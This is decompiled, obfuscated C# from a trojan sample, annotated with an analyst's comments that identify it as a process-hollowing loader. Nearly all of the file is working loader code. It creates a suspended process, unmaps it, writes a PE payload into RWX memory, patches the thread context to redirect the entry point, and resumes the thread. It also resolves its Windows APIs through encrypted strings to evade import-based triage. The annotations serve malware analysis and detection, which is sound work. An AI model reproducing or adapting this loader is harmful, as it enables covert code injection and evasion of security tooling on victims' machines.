// Decompiled with JetBrains decompiler
// Type:
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System;
using System.Runtime.InteropServices;
// Analyst notes (all identifiers are obfuscated by the original packer; names below are as decompiled).
//
// What the visible code does, in order:
//   1. Parses the byte[] argument as a 32-bit PE image (checks the 0x5A4D and 0x00004550 signatures).
//   2. Resolves seven native functions at run time through LoadLibrary/GetProcAddress. The library and
//      function names come from \u0008.\u0002(int), which is defined outside this file and is presumably
//      the obfuscator's string-decryption routine, so the API names never appear as static imports.
//   3. Calls them in a sequence whose argument shapes and constants are consistent with:
//      create process with flag 4, unmap, remote allocate (0x3000 / 0x40), remote write of headers and
//      sections, get thread context, patch context, set thread context, resume thread.
//
// NOTE(review): this sequence matches the process-hollowing pattern (MITRE ATT&CK T1055.012). The API
// identities are inferred from delegate signatures and constants only; confirm by decrypting the strings.
//
// Detection-relevant behaviour visible here: a child process started suspended, a remote RWX allocation
// at the payload's preferred image base, cross-process memory writes, and a thread-context change before
// the first resume. The resulting process image in memory will differ from its backing file on disk.
internal sealed class \u0003
{
  // Writes the string returned by \u0008.\u0002(-626735471) to the console.
  // It is invoked between almost every step of the loader method below and its result is never used;
  // NOTE(review): looks like obfuscator filler or a timing/no-op call rather than functional logic.
  private void \u0002() => Console.Write(\u0008.\u0002(-626735471));

  // The only two static imports of the class. Every other native call is resolved through these at
  // run time, so import-table based triage sees only GetProcAddress and LoadLibrary.
  [DllImport("kernel32")]
  private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);

  [DllImport("kernel32")]
  private static extern IntPtr LoadLibrary(string _param0);

  // Loader entry point.
  //   _param1: raw bytes of a PE file (validated below by its MZ / PE signatures).
  //   _param2: passed as the 2nd argument of the first resolved function (command-line position, if that
  //            function is CreateProcess as its signature suggests).
  //   _param3: passed as the 1st argument of that function (application-path position, same caveat).
  // Returns nothing; all native return values except the allocation result are ignored.
  public void \u0002(byte[] _param1, string _param2, string _param3)
  {
    // obj1 and obj2 are never read again in this method.
    \u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
    \u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
    this.\u0002();
    \u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
    \u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
    this.\u0002();
    \u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
    \u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
    this.\u0002();
    // First field of structure2 receives the marshalled size of the struct itself
    // (the "cb" convention; the struct layout is consistent with STARTUPINFO).
    structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
    // 65543 == 0x10007. obj4's layout is consistent with the x86 CONTEXT structure, where 0x10007
    // is CONTEXT_FULL - inferred from the value and field order.
    obj4.\u0002 = 65543U;
    this.\u0002();
    // Pin the payload buffer to obtain its raw address. ToInt32() truncates to 32 bits, so the
    // code assumes a 32-bit process.
    GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
    int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
    this.\u0002();
    // The pin is released here; the saved raw address is still read by the PtrToStructure calls below.
    gcHandle.Free();
    // Header at offset 0 of the buffer (layout consistent with IMAGE_DOS_HEADER).
    \u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
    this.\u0002();
    // Header at the offset stored in the last field of structure3 (the e_lfanew position);
    // layout consistent with IMAGE_NT_HEADERS32.
    \u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
    this.\u0002();
    // 17744 == 0x4550 ("PE\0\0"), 23117 == 0x5A4D ("MZ"). Anything that is not a PE file is silently ignored.
    if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
      return;
    // Run-time API resolution. Six of the seven lookups use library string id -626735648; the second
    // lookup uses a different library string id (-626735864). The decrypted names are not visible in
    // this file. Roles below are inferred from each delegate's signature and call site - TODO confirm.
    // forFunctionPointer1: 10-argument process-creation shape (see delegate \u0002).
    \u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735843)), typeof (\u0003.\u0002));
    // forFunctionPointer2: (handle, address) - called with the process handle and the image base.
    \u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735864)), \u0008.\u0002(-626735816)), typeof (\u0003.\u0005));
    // forFunctionPointer3: (handle, address, size, type, protection) - remote allocation shape.
    \u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735779)), typeof (\u0003.\u0008));
    this.\u0002();
    // forFunctionPointer4: (handle, address, buffer, length, out-count) - remote write shape.
    \u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735800)), typeof (\u0003.\u0003));
    // forFunctionPointer5: (thread handle, ref context) - context read shape.
    \u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735773)), typeof (\u0003.\u0006));
    // forFunctionPointer6: (thread handle, [In] ref context) - context write shape.
    \u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736488)), typeof (\u0003.\u000E));
    this.\u0002();
    // forFunctionPointer7: uint f(thread handle) - resume-thread shape.
    \u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736463)), typeof (\u0003.\u000F));
    this.\u0002();
    // Creation flag 4 is CREATE_SUSPENDED if this is CreateProcess; obj3 receives two handles and two
    // ids (PROCESS_INFORMATION shape). The result is stored in num1 and never checked.
    int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
    // Called with the new process handle and the payload's preferred image base
    // (structure4.\u0005.\u0005\u2000 sits at the ImageBase position of the optional header).
    int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
    this.\u0002();
    // 12288 == 0x3000 (MEM_COMMIT | MEM_RESERVE) and 64 == 0x40 (PAGE_EXECUTE_READWRITE) if this is a
    // VirtualAllocEx-style call; the size argument sits at the SizeOfImage position. This is the only
    // checked result: on failure the method returns and does nothing further with the created process.
    if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
      return;
    // Writes the first structure4.\u0005.\u000F\u2001 bytes of the payload (SizeOfHeaders position)
    // to the image base in the other process.
    int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
    this.\u0002();
    // One iteration per section; the bound is structure4.\u0003.\u0003 (NumberOfSections position).
    for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
    {
      // Section header index1, read from directly after the NT headers in the payload buffer.
      structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
      // Copy structure1.\u0008 bytes starting at file offset structure1.\u0006 into a temporary buffer
      // (SizeOfRawData / PointerToRawData positions of the section header).
      byte[] numArray = new byte[(IntPtr) structure1.\u0008];
      for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
        numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
      this.\u0002();
      // Write the section to image base + structure1.\u0005 (VirtualAddress position) in the other process.
      int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
    }
    // Read the context of the thread whose handle is obj3.\u0003 into obj4.
    int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
    this.\u0002();
    // Write the 4-byte image base into the other process at (obj4.\u0002\u2001 + 8).
    // NOTE(review): in the x86 CONTEXT layout that field position is Ebx; hollowing loaders use this
    // write to update the image base recorded in the child's PEB - inferred, confirm in a debugger.
    byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
    int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
    // Context field \u0008\u2001 (Eax position in the x86 layout) is set to image base + the
    // optional-header field at the AddressOfEntryPoint position.
    obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
    this.\u0002();
    // Apply the modified context, then call the final function on the thread handle (resume shape).
    int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
    int num8 = (int) forFunctionPointer7(obj3.\u0003);
  }

  // Signature shape matches CreateProcess: two strings, two pointers, a bool, a flags enum, a pointer,
  // a string, ref startup-info struct, out process-info struct. Identity inferred - name is encrypted.
  private delegate bool \u0002(
    string _param1,
    string _param2,
    IntPtr _param3,
    IntPtr _param4,
    bool _param5,
    \u0003.\u0002\u2000 _param6,
    IntPtr _param7,
    string _param8,
    ref \u0003.\u0006\u2000 _param9,
    out \u0003.\u000E\u2000 _param10);

  // Signature shape matches a remote memory write: handle, destination, source buffer, length,
  // and a final argument that every call site passes as null.
  private delegate bool \u0003(
    IntPtr _param1,
    IntPtr _param2,
    byte[] _param3,
    uint _param4,
    object _param5);

  // (handle, address) -> bool. Called once, with the process handle and the payload image base.
  private delegate bool \u0005(IntPtr _param1, IntPtr _param2);

  // (thread handle, ref context struct) -> bool. Used to read the thread context.
  private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);

  // Signature shape matches a remote allocation: handle, address, size, allocation type, protection.
  // Declared as returning bool, so the call site only sees whether the result was non-zero.
  private delegate bool \u0008(
    IntPtr _param1,
    IntPtr _param2,
    uint _param3,
    \u0003.\u0008\u2000 _param4,
    \u0003.\u0005\u2000 _param5);

  // (thread handle, [In] ref context struct) -> bool. Used to write the thread context.
  private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);

  // (thread handle) -> uint. Last call of the loader method.
  private delegate uint \u000F(IntPtr _param1);

  // Empty enum used as the flags parameter of delegate \u0002; the loader casts the literal 4 to it.
  private enum \u0002\u2000 : uint
  {
  }

  // 40-byte record: 8-byte array, six uints, two ushorts, one uint.
  // Layout is consistent with IMAGE_SECTION_HEADER - inferred from field shape.
  private struct \u0002\u2002
  {
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
    public byte[] \u0002;
    public uint \u0003;
    // Added to the image base as the remote destination of the section (VirtualAddress position).
    public uint \u0005;
    // Number of bytes copied for the section (SizeOfRawData position).
    public uint \u0008;
    // Offset of the section data inside the payload buffer (PointerToRawData position).
    public uint \u0006;
    public uint \u000E;
    public uint \u000F;
    public ushort \u0002\u2000;
    public ushort \u0003\u2000;
    public uint \u0005\u2000;
  }

  // Empty enum; not referenced by any member visible in this file.
  private enum \u0003\u2000 : uint
  {
  }

  // Empty enum used as the last parameter of delegate \u0008; the loader casts the literal 64 to it.
  private enum \u0005\u2000 : uint
  {
  }

  // Size-prefixed record (first field is set to the struct's own size by the loader).
  // Layout is consistent with STARTUPINFO - inferred from field shape.
  private struct \u0006\u2000
  {
    public uint \u0002;
    public string \u0003;
    public string \u0005;
    public string \u0008;
    public uint \u0006;
    public uint \u000E;
    public uint \u000F;
    public uint \u0002\u2000;
    public uint \u0003\u2000;
    public uint \u0005\u2000;
    public uint \u0008\u2000;
    public uint \u0006\u2000;
    public short \u000E\u2000;
    public short \u000F\u2000;
    public IntPtr \u0002\u2001;
    public IntPtr \u0003\u2001;
    public IntPtr \u0005\u2001;
    public IntPtr \u0008\u2001;
  }

  // Empty enum used as the 4th parameter of delegate \u0008; the loader casts the literal 12288 to it.
  private enum \u0008\u2000 : uint
  {
  }

  // Output of the process-creation call. Layout is consistent with PROCESS_INFORMATION.
  private struct \u000E\u2000
  {
    // Passed as the handle argument of the unmap, allocate and write calls.
    public IntPtr \u0002;
    // Passed as the handle argument of the context and resume calls.
    public IntPtr \u0003;
    public uint \u0005;
    public uint \u0008;
  }

  // (int, pointer, bool) record; not referenced by any member visible in this file.
  // NOTE(review): shape resembles SECURITY_ATTRIBUTES - unverified.
  private struct \u000F\u2000
  {
    public int \u0002;
    public IntPtr \u0003;
    public bool \u0005;
  }

  // 64-byte record read from offset 0 of the payload. Layout is consistent with IMAGE_DOS_HEADER.
  private struct \u0002\u2001
  {
    // Compared against 23117 (0x5A4D, "MZ") by the loader.
    public ushort \u0002;
    public ushort \u0003;
    public ushort \u0005;
    public ushort \u0008;
    public ushort \u0006;
    public ushort \u000E;
    public ushort \u000F;
    public ushort \u0002\u2000;
    public ushort \u0003\u2000;
    public ushort \u0005\u2000;
    public ushort \u0008\u2000;
    public ushort \u0006\u2000;
    public ushort \u000E\u2000;
    public ushort \u000F\u2000;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
    public ushort[] \u0002\u2001;
    public ushort \u0003\u2001;
    public ushort \u0005\u2001;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
    public ushort[] \u0008\u2001;
    // Offset of the next header inside the payload buffer (e_lfanew position).
    public int \u0006\u2001;
  }

  // 20-byte record embedded in \u0006\u2001. Layout is consistent with IMAGE_FILE_HEADER.
  private struct \u0003\u2001
  {
    public ushort \u0002;
    // Loop bound for the section copy (NumberOfSections position).
    public ushort \u0003;
    public uint \u0005;
    public uint \u0008;
    public uint \u0006;
    public ushort \u000E;
    public ushort \u000F;
  }

  // Pair of uints; used only as the element type of the 16-entry array at the end of \u0008\u2001
  // (IMAGE_DATA_DIRECTORY shape).
  private struct \u0005\u2001
  {
    public uint \u0002;
    public uint \u0003;
  }

  // Signature + two nested headers. Layout is consistent with IMAGE_NT_HEADERS32.
  private struct \u0006\u2001
  {
    // Compared against 17744 (0x4550, "PE\0\0") by the loader.
    public uint \u0002;
    public \u0003.\u0003\u2001 \u0003;
    public \u0003.\u0008\u2001 \u0005;
  }

  // Layout is consistent with the 32-bit IMAGE_OPTIONAL_HEADER - inferred from field shape.
  // Only the four fields commented below are read by the loader.
  private struct \u0008\u2001
  {
    public ushort \u0002;
    public byte \u0003;
    public byte \u0005;
    public uint \u0008;
    public uint \u0006;
    public uint \u000E;
    // Added to the image base to form the value stored into the thread context (AddressOfEntryPoint position).
    public uint \u000F;
    public uint \u0002\u2000;
    public uint \u0003\u2000;
    // Used as the remote base address for the unmap, allocate and write calls (ImageBase position).
    public uint \u0005\u2000;
    public uint \u0008\u2000;
    public uint \u0006\u2000;
    public ushort \u000E\u2000;
    public ushort \u000F\u2000;
    public ushort \u0002\u2001;
    public ushort \u0003\u2001;
    public ushort \u0005\u2001;
    public ushort \u0008\u2001;
    public uint \u0006\u2001;
    // Size passed to the remote allocation (SizeOfImage position).
    public uint \u000E\u2001;
    // Length of the first remote write (SizeOfHeaders position).
    public uint \u000F\u2001;
    public uint \u0002\u2002;
    public ushort \u0003\u2002;
    public ushort \u0005\u2002;
    public uint \u0008\u2002;
    public uint \u0006\u2002;
    public uint \u000E\u2002;
    public uint \u000F\u2002;
    public uint \u0002\u2003;
    public uint \u0003\u2003;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
    public \u0003.\u0005\u2001[] \u0005\u2003;
  }

  // Seven uints, an 80-byte array and a trailing uint; embedded in \u000F\u2001.
  // Layout is consistent with the x86 FLOATING_SAVE_AREA - inferred from field shape.
  private struct \u000E\u2001
  {
    public uint \u0002;
    public uint \u0003;
    public uint \u0005;
    public uint \u0008;
    public uint \u0006;
    public uint \u000E;
    public uint \u000F;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
    public byte[] \u0002\u2000;
    public uint \u0003\u2000;
  }

  // Thread-context record passed by reference to the context read/write delegates.
  // Layout is consistent with the 32-bit x86 CONTEXT structure - inferred from field shape.
  private struct \u000F\u2001
  {
    // Set to 65543 (0x10007) before the context is read.
    public uint \u0002;
    public uint \u0003;
    public uint \u0005;
    public uint \u0008;
    public uint \u0006;
    public uint \u000E;
    public uint \u000F;
    public \u0003.\u000E\u2001 \u0002\u2000;
    public uint \u0003\u2000;
    public uint \u0005\u2000;
    public uint \u0008\u2000;
    public uint \u0006\u2000;
    public uint \u000E\u2000;
    public uint \u000F\u2000;
    // Read by the loader; (value + 8) is the target address of a 4-byte remote write. Ebx position.
    public uint \u0002\u2001;
    public uint \u0003\u2001;
    public uint \u0005\u2001;
    // Overwritten by the loader with image base + entry-point offset. Eax position.
    public uint \u0008\u2001;
    public uint \u0006\u2001;
    public uint \u000E\u2001;
    public uint \u000F\u2001;
    public uint \u0002\u2002;
    public uint \u0003\u2002;
    public uint \u0005\u2002;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
    public byte[] \u0008\u2002;
  }
}